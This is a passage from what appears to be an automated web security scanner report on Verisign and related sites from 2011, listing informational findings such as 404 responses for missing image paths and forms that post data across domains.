12.4. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/nav_grad.png,/authweb/global/assets/shared/images/nav/nav_left.png,/authweb/global/assets/shared/images/nav/nav_right.png,/authweb/global/assets/shared/images/nav/arrow_red.png,/authweb/global/assets/shared/images/nav/arrow_white.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:26 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:26 2011<br />
Apache</span>
</address>
</body>
</html>


12.5. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_left.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/nav_left.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/nav_left.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:16 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:16 2011<br />
Apache</span>
</address>
</body>
</html>


12.6. http://blogs.verisign.com/authweb/global/assets/shared/images/nav/nav_right.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.verisign.com
Path:   /authweb/global/assets/shared/images/nav/nav_right.png

Request 1

GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
Referer: http://blogs.verisign.com/?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 1

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 1159

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


The link on the
<a href="http://blogs.verisign.com/%3ftid=footer">referring
page</a> seems to be wrong or outdated. Please inform the author of
<a href="http://blogs.verisign.com/%3ftid=footer">that page</a>
about the error.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:10 2011<br />
Apache</span>
</address>
</body>
</html>

Request 2

GET /authweb/global/assets/shared/images/nav/nav_right.png HTTP/1.1
Host: blogs.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response 2

HTTP/1.1 404 Not Found
Date: Fri, 09 Sep 2011 21:26:16 GMT
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Connection: close
Content-Length: 996

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<p>


The requested URL was not found on this server.


If you entered the URL manually please check your
spelling and try again.



</p>
<p>
If you think this is a server error, please contact
the <a href="mailto:root@localhost">webmaster</a>.

</p>

<h2>Error 404</h2>
<address>
<a href="/">blogapp</a><br />

<span>Fri Sep 9 21:26:16 2011<br />
Apache</span>
</address>
</body>
</html>


12.7. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Request 1

GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 1

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:34:11 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:34:11 GMT; path=/hc/2735064; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

Request 2

GET /hc/2735064/?&site=2735064&cmd=mTagInviteShown&lpCallId=320617608027-425706728594&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&channel=web&t=1 HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603944147

Response 2

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:35:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:35:25 GMT
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 343

lpConnLib.Process({"ResultSet": {"lpCallId":"320617608027-425706728594","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INVITE-SHOWN", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});

13. Cross-domain POST
There are 25 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


13.1. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="sbmodulebody">
                           
                           
                               <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post">
                                   Order Number<sup>
...[SNIP]...

13.2. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.3. https://knowledge.verisign.ch/support/code-signing-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/code-signing-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/code-signing-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.4. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.5. https://knowledge.verisign.ch/support/digital-id-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/digital-id-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/digital-id-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.6. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.7. https://knowledge.verisign.ch/support/mpki-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/mpki-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/mpki-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.8. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.9. https://knowledge.verisign.ch/support/ssl-certificates-support/index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:33 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
</h4>
                           <form target="_top" id="myacc_search" action="https://securitycenter.verisign.com/celp/enroll/orderStatus"
                           method="post">

                           <fieldset id="myacc_fieldset">
...[SNIP]...

13.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.12. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/ssl-certificates-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

Request

GET /support/ssl-certificates-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="sbmodulebody">
                           
                           
                               <form name="checkOrder" action="https://securitycenter.verisign.com/celp/enroll/orderStatus" method="post">
                                   Order Number<sup>
...[SNIP]...

13.13. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The page contains a form which POSTs data to the domain products.verisign.com. The form contains the following fields:

Request

GET /support/trust-seal-support/index.html HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:43:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Connection: close


                                                                                                                                                                                                                                               <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
...[SNIP]...
<div class="partner_form">
                                   <form target="_blank" action="https://products.verisign.com/geocenter/reseller/logon.do" method="post"
                                   id="partner_login" name="logonForm">

                                   <div>
...[SNIP]...

13.14. https://knowledge.verisign.ch/support/trust-seal-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /support/trust-seal-support/index.html

Issue detail

The page contains a form which POSTs data to the domain securitycenter.verisign.com. The form contains the following fields:

